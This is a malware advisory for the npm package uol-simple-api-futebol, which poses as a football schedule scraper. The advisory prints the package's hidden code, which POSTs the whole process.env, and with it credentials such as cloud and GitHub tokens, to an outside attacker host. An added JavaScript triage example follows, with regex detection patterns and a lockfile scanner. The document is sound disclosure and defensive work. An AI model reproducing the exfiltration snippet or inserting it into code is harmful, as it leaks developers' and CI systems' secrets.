MAL-2026-6087
Malicious code in uol-simple-api-futebol (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334)

The package advertises itself as a scraper of UOL football schedules, but its main exported function `getJogos()` routes through `getUOLData()` → `prepareCacheMatchs(url)`, which POSTs an object containing the entire `process.env` to `http://cache.xui-managers.site/global-cache` over plain HTTP. The destination domain has no relationship to UOL or to any documented dependency, and the names `prepareCacheMatchs` / `global-cache` are cover-story labels — no caching is performed; the function's only effect is one-way export of the caller's environment.

On developer and CI machines, `process.env` routinely contains credentials such as `AWS_*`, `GITHUB_TOKEN`, `NPM_TOKEN`, database URLs, and third-party API keys, all of which are silently shipped to the attacker-controlled host the moment the consumer queries football schedules.

Code path observed in `dist/index.js`:

```js
const e = { stream_source: [url], test: process.env };
await axios.post("http://cache.xui-managers.site/global-cache", e,...)
```
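A triage check for the pattern described above, as an added example that is not code from the advisory or from the package. The helper names `scanSource` and `lockfileVersions`, the placeholder host, and the sample versions are assumptions constructed for illustration.

```javascript
// Added example (not from the advisory): static triage for whole-process.env export.
// Constructed sample mirroring the reported code path; the host is a placeholder.
const SAMPLE_SOURCE = `
async function prepareCacheMatchs(url) {
  const e = { stream_source: [url], test: process.env };
  await axios.post("http://collector.example.invalid/global-cache", e);
}`;
const SAMPLE_BENIGN = `const port = process.env.PORT; fetch("https://example.invalid/?p=" + port);`;
// Constructed lockfile (v3 layout); the versions are made up.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo-app" },
  "node_modules/axios": { version: "1.0.0" },
  "node_modules/some-lib/node_modules/uol-simple-api-futebol": { version: "0.0.0-constructed" },
} };

// `process.env` used as a whole object, i.e. NOT followed by .KEY or [KEY].
const WHOLE_ENV = /\bprocess\s*\.\s*env\b(?!\s*[.\[])/g;
const NET_CALL = /\b(?:axios\s*\.\s*(?:post|put|request)|fetch|https?\s*\.\s*request)\s*\(/;
const PLAIN_HTTP = /["'`]http:\/\/[^"'`\s]+/g;

// Hypothetical helper: flags a file for manual review when it references the
// whole environment object and also makes an outbound network call.
function scanSource(source) {
  const wholeEnvUses = (source.match(WHOLE_ENV) || []).length;
  const plainHttpUrls = (source.match(PLAIN_HTTP) || []).map((u) => u.slice(1));
  const hasNetCall = NET_CALL.test(source);
  return { wholeEnvUses, hasNetCall, plainHttpUrls, suspicious: wholeEnvUses > 0 && hasNetCall };
}

// Hypothetical helper: every installed version of `name` in a parsed package-lock.json,
// including transitive installs. v2/v3 key by path under "packages"; v1 nests "dependencies".
function lockfileVersions(lock, name) {
  const found = new Set();
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const hit = path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`);
    if (hit) found.add(meta.version);
  }
  const walk = (deps) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      if (dep === name) found.add(meta.version);
      walk(meta.dependencies);
    }
  };
  walk(lock.dependencies);
  return [...found].sort();
}
```

The regex pass is triage only: aliased access such as `const { env } = process` is not matched, so a clean result does not clear a file.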
Affected packages
No fixed version published yet for uol-simple-api-futebol (npm). Pin to a known-safe version or switch to an alternative.